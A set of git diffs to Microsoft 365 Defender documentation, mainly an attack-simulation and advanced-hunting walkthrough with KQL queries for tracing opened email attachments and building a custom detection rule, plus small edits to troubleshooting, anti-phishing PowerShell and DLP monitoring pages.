Navigate back to the incident in the Microsoft 365 Security Center portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation. ![Screenshot of automated investigations related to the incident](../../media/mtp/fig14.png)
-Select the alert that triggered an investigation to open the **Investigation details** page. YouΓÇÖll see the following details:
+Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
+ - Alert(s) that triggered the automated investigation. - Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well. - List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious. - Threats found. Known threats that are found during the investigation.
->[!NOTE]
->Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
+> [!NOTE]
+> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
![Screenshot of Investigation details page](../../media/mtp/fig15.png)
-During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
+During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
@@ -265,192 +258,190 @@ Select **Manage incident**. Set the status to **Resolve incident** and select th
When the incident is resolved, it closes all of the associated alerts in Microsoft 365 Security Center and in the related portals.
-![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
+![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
-<br>
-This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
+This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
## Advanced hunting scenario
->[!NOTE]
->Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
+> [!NOTE]
+> Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
->[!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
### Hunting environment requirements+ There's a single internal mailbox and device required for this scenario. You'll also need an external email account to send the test message.
-1. Verify that your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
-2. Identify a target mailbox to be used for receiving email.
- a. This mailbox must be monitored by Microsoft Defender for Office 365
- b. The device from requirement 3 needs to access this mailbox
-3. Configure a test device:
- a. Make sure you are using Windows 10 version 1903 or later version.
- b. Join the test device to the test domain.
- c. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
- d. [Onboard to Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+1. Verify that your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
+2. Identify a target mailbox to be used for receiving email.
+ a. This mailbox must be monitored by Microsoft Defender for Office 365
+ b. The device from requirement 3 needs to access this mailbox
+3. Configure a test device:
+ a. Make sure you are using Windows 10 version 1903 or later version.
+ b. Join the test device to the test domain.
+ c. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+ d. [Onboard to Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
### Run the simulation
-1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
-2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
+1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
+2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
-**Go hunting**
-1. Open the security.microsoft.com portal.
+#### Go hunting
-2. Navigate to **Hunting > Advanced hunting**.
+1. Open the security.microsoft.com portal.
- ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
+2. Navigate to **Hunting > Advanced hunting**.
-3. Build a query that starts by gathering email events.
+ ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
- 1. From the query pane, select New.
-
- 1. Double-click on the EmailEvents table from the schema.
+3. Build a query that starts by gathering email events.
- ```
- EmailEvents
- ```
+ 1. From the query pane, select New.
- 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
-
- ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
+ 1. Double-click on the EmailEvents table from the schema.
- 1. Run the query. You may have many results depending on the environment for the pilot.
+ ```console
+ EmailEvents
+ ```
- > [!NOTE]
- > See the next step for filtering options to limit data return.
+ 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
+
+ ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
+
+ 1. Run the query. You may have many results depending on the environment for the pilot.
- ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
+ > [!NOTE]
+ > See the next step for filtering options to limit data return.
+
+ ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
> [!NOTE]
- > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
+ > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
- 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
+ 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
- In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
-
- ![Screenshot of the filters. Use filters to narrow down the search, and find what youΓÇÖre looking for faster.](../../media/mtp/fig20.png)
+ In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
- ```console
- EmailEvents
- | where SenderMailFromDomain == "yahoo.com"
- ```
+ ![Screenshot of the filters. Use filters to narrow down the search, and find what you're looking for faster.](../../media/mtp/fig20.png)
- 1. Click the resulting rows from the query so you can inspect the record.
-
- ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
+ ```console
+ EmailEvents
+ | where SenderMailFromDomain == "yahoo.com"
+ ```
-4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add ΓÇ£| where **AttachmentCount > 0** and **EmailDirection** == **ΓÇ£InboundΓÇ¥ΓÇ¥**
+ 1. Click the resulting rows from the query so you can inspect the record.
- The following query will show you the result with a shorter list than your initial query for all email events:
+ ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
+4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
- ```
+ The following query will show you the result with a shorter list than your initial query for all email events:
-5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ ```
- The following query also includes an additional line ΓÇ£| **project-rename EmailTimestamp=Timestamp**ΓÇ¥ that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
+5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- ```
+ The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
-6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ ```
- The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
+6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- ```
+ The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
-You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ ```
-7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
+ You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+
+7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
```console
- EmailEvents
+ EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
+ | project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
+ | join DeviceFileEvents on SHA256
| where ActionType == "FileCreated" | distinct SHA1 | invoke FileProfile() ```
+#### Create a detection
-**Create a detection**
-
-Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
+Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
-1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
-
- ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
+1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
+
+ ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
- > [!NOTE]
- > If you click **Create detection rule** and you have syntax errors in your query, your detection rule wonΓÇÖt be saved. Double-check your query to ensure thereΓÇÖs no errors.
+ > [!NOTE]
+ > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
+2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
-2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
+ ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
- ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
+ Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
- Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
+3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
-3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
+ ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
- ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
-
+4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
-4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
+ ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
- ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
+5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
-5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
+ ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
- ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that youΓÇÖll see](../../media/mtp/fig26.png)
+ For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
- For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
+6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-
- ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
+ ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
- ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
+ ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
- From this page, you can select the detection rule, which will open a details page.
+ From this page, you can select the detection rule, which will open a details page.
- ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
+ ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
### Additional advanced hunting walk-through exercises To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities and create custom detections and remediation actions.
->[!NOTE]
->Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
+> [!NOTE]
+> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
-| Title | Description | Download MP4 | Watch on YouTube | CSL file to use |
-|:-----|:-----|:-----|:-----|:-----|
-| Episode 1: KQL fundamentals | WeΓÇÖll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators. | [ MP4](https://aka.ms/MTP15JUL20_MP4) | [YouTube](https://youtu.be/0D9TkGjeJwM) | [Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl) |
-| Episode 2: Joins | WeΓÇÖll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join. | [MP4](https://aka.ms/MTP22JUL20_MP4) | [YouTube](https://youtu.be/LMrO6K5TWOU) | [Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl) |
-| Episode 3: Summarizing, pivoting, and visualizing data|Now that weΓÇÖre able to filter, manipulate, and join data, itΓÇÖs time to start summarizing, quantifying, pivoting, and visualizing. In this episode, weΓÇÖll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis. | [MP4](https://aka.ms/MTP29JUL20_MP4) | [YouTube](https://youtu.be/UKnk9U1NH6Y) | [Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl) |
-| Episode 4: LetΓÇÖs hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, weΓÇÖll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response. | [MP4](https://aka.ms/MTP5AUG20_MP4) | [YouTube](https://youtu.be/2EUxOc_LNd8) | [Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl) |
+|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
+|---|---|---|---|---|
+|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
+|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
+|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
+|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
+|
## Next step
-|![Closing and summary phase](../../media/mtp/close.png) <br>[Closing and summary phase](mtp-pilot-close.md) | Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
-|:-----|:-----|
+|![Closing and summary phase](../../media/mtp/close.png) <br>[Closing and summary phase](mtp-pilot-close.md)|Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
+|:-----|:-----|
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/troubleshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/troubleshoot.md
@@ -14,7 +14,7 @@ author: mjcaparas
ms.localizationpriority: medium manager: dansimp audience: ITPro
-ms.collection: M365-security-compliance
+ms.collection: M365-security-compliance
ms.topic: conceptual search.appverid: - MOE150
@@ -31,18 +31,18 @@ search.appverid:
This section addresses issues that might arise as you use the Microsoft 365 Defender service. - ## I don't see Microsoft 365 Defender content
-If you don't see capabilities on the navigation pane such as the Incidents, Action Center, or Hunting in your portal, you'll need to verify that your tenant has the appropriate licenses.
+
+If you don't see capabilities on the navigation pane such as the Incidents, Action Center, or Hunting in your portal, you'll need to verify that your tenant has the appropriate licenses.
For more information, see [Prerequisites](prerequisites.md). ## Microsoft Defender for Identity alerts are not showing up in the Microsoft 365 Defender incidents
-If you have Microsoft Defender for Identity deployed in your environment but you're not seeing Defender for Identity alerts as part of Microsoft 365 Defender incidents, you'll need to ensure that the Microsoft Cloud App Security and Defender for Identity integration is enabled.
-For more information, see [Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/aatp-integration).
+If you have Microsoft Defender for Identity deployed in your environment but you're not seeing Defender for Identity alerts as part of Microsoft 365 Defender incidents, you'll need to ensure that the Microsoft Cloud App Security and Defender for Identity integration is enabled.
+
+For more information, see [Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/mdi-integration).
## Where is the settings page for turning the service on?
-To turn on Microsoft 365 Defender, access **Settings** from the navigation pane in the Microsoft 365 security center. This navigation item is visible only if you have the [prerequisite permissions and licenses](mtp-enable.md#check-license-eligibility-and-required-permissions).
-
+To turn on Microsoft 365 Defender, access **Settings** from the navigation pane in the Microsoft 365 security center. This navigation item is visible only if you have the [prerequisite permissions and licenses](mtp-enable.md#check-license-eligibility-and-required-permissions).
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-anti-phishing-policies-eop https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/configure-anti-phishing-policies-eop.md
@@ -301,7 +301,7 @@ Creating an anti-phishing policy in PowerShell is a two-step process:
To create an anti-phish policy, use this syntax: ```PowerShell
-New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableAntiSpoofEnforcement <$true | $false>] [-AuthenticationFailAction <MoveToJmf | Quarantine>] [-EnableUnauthenticatedSender <$true | $false>]
+New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableSpoofIntelligence <$true | $false>] [-AuthenticationFailAction <MoveToJmf | Quarantine>] [-EnableUnauthenticatedSender <$true | $false>]
``` This example creates an anti-phish policy named Research Quarantine with the following settings:
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/email-validation-and-authentication https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-validation-and-authentication.md
@@ -140,7 +140,7 @@ You can use this method to resolve intra-org spoofing and cross-domain spoofing
- [Consider setting up DMARC records](use-dmarc-to-validate-email.md) for your domain to determine your legitimate senders.
-Microsoft doesn't provide detailed implementation guidelines for SPF, DKIM, and DMARC records. However, there's many information available online. There are also third party companies dedicated to helping your organization setup email authentication records.
+Microsoft doesn't provide detailed implementation guidelines for SPF, DKIM, and DMARC records. However, there's many information available online. There are also third party companies dedicated to helping your organization set up email authentication records.
#### You don't know all sources for your email
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/how-policies-and-protections-are-combined https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/how-policies-and-protections-are-combined.md
@@ -61,7 +61,7 @@ For example, consider the following anti-phishing policies in Microsoft Defender
|Policy B|2|Off|On| |
-1. The message is marked and treated as spoof, because spoofing has a higher priority (4) than user impersonation (8).
+1. The message is marked and treated as spoof, because spoofing has a higher priority (4) than user impersonation (5).
2. Policy A is applied to the users because it has a higher priority than Policy B. 3. Based on the settings in Policy A, no action is taken on the message, because anti-spoofing is turned off in the policy. 4. Policy processing stops, so Policy B is never applied to the users.
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/learn-about-spoof-intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/learn-about-spoof-intelligence.md
@@ -202,7 +202,7 @@ To verify that you've configured spoof intelligence with senders who are allowed
- In Exchange Online PowerShell, replace \<Name\> with Office365 AntiPhish Default or the name of a custom policy, and run the following command to verify the settings: ```PowerShell
- Get-AntiPhishPolicy -Identity "<Name>" | Format-List EnableAntiSpoofEnforcement,EnableUnauthenticatedSender,AuthenticationFailAction
+ Get-AntiPhishPolicy -Identity "<Name>" | Format-List EnableSpoofIntelligence,EnableUnauthenticatedSender,AuthenticationFailAction
``` ## Other ways to manage spoofing and phishing
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/monitor-for-leaks-of-personal-data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/monitor-for-leaks-of-personal-data.md
@@ -30,15 +30,15 @@ There are many tools that can be used to monitor the use and transport of person
In the illustration: -- Start with Microsoft 365 data loss prevention reports for monitoring personal data in SharePoint Online, OneDrive for Business, and email in transit. These provide the greatest level of detail for monitoring personal data. However, these reports don't include all services in Office 365.
+- Start with Microsoft 365 data loss prevention reports for monitoring personal data in SharePoint Online, OneDrive for Business, and email in transit. These reports provide the greatest level of detail for monitoring personal data. However, these reports don't include all services in Office 365.
-- Next, use alert policies and the audit log to monitor activity across services. Setup ongoing monitoring or search the audit log to investigate an incident. The audit log works across services ΓÇö Sway, PowerBI, eDiscovery, Dynamics 365, Microsoft Flow, Microsoft Teams, Admin activity, OneDrive for Business, SharePoint Online, mail in transit, and mailboxes at rest. Skype conversations are included in mailboxes at rest.
+- Next, use alert policies and the audit log to monitor activity across services. Set up ongoing monitoring or search the audit log to investigate an incident. The audit log works across servicesΓÇöSway, Power BI, eDiscovery, Dynamics 365, Microsoft Flow, Microsoft Teams, Admin activity, OneDrive for Business, SharePoint Online, mail in transit, and mailboxes at rest. Skype conversations are included in mailboxes at rest.
-- Finally, Use Microsoft Cloud App Security to monitor files with sensitive data in other SaaS providers. Coming soon is the ability to use sensitive information types and unified labels across Azure Information Protection and Office with Cloud App Security. You can setup policies that apply to all of your SaaS apps or specific apps (like Box). Cloud App Security doesn't discover files in Exchange Online, including files attached to email.
+- Finally, Use Microsoft Cloud App Security to monitor files with sensitive data in other SaaS providers. Coming soon is the ability to use sensitive information types and unified labels across Azure Information Protection and Office with Cloud App Security. You can set up policies that apply to all of your SaaS apps or specific apps (like Box). Cloud App Security doesn't discover files in Exchange Online, including files attached to email.
## Data loss prevention reports
-After you create your data loss prevention (DLP) policies, you'll want to verify that they're working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they're trending up or down over time; filter the report in different ways; and view additional details by selecting a point on a line on the graph.
+After you create your data loss prevention (DLP) policies, you'll want to verify that they're working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they're trending up or down over time; filter the report in different ways; and view more details by selecting a point on a line on the graph.
You can use the DLP reports to:
@@ -54,7 +54,7 @@ You can use the DLP reports to:
- View a list of files with sensitive data that matches your DLP policies in the details pane.
-In addition, you can use the DLP reports to fine tune your DLP policies as you run them in test mode.
+In addition, you can use the DLP reports to fine-tune your DLP policies as you run them in test mode.
DLP reports are in the security center and the compliance center. Navigate to Reports \> View reports. Under Data loss prevention (DLP), go to either DLP policy and rule matches or DLP false positives and overrides.
@@ -68,15 +68,15 @@ The audit log contains events from Exchange Online, SharePoint Online, OneDrive
The security center and compliance center provide two ways to monitor and report against the audit log: -- Setup alert policies, view alerts, and monitor trends ΓÇö Use the alert policy and alert dashboard tools in either the security center or compliance center.
+- Set up alert policies, view alerts, and monitor trendsΓÇöUse the alert policy and alert dashboard tools in either the security center or compliance center.
-- Search the audit log directly ΓÇö Search for all events in a specified date rage. Or you can filter the results based on specific criteria, such as the user who performed the action, the action, or the target object.
+- Search the audit log directly: Search for all events in a specified date rage. Or you can filter the results based on specific criteria, such as the user who performed the action, the action, or the target object.
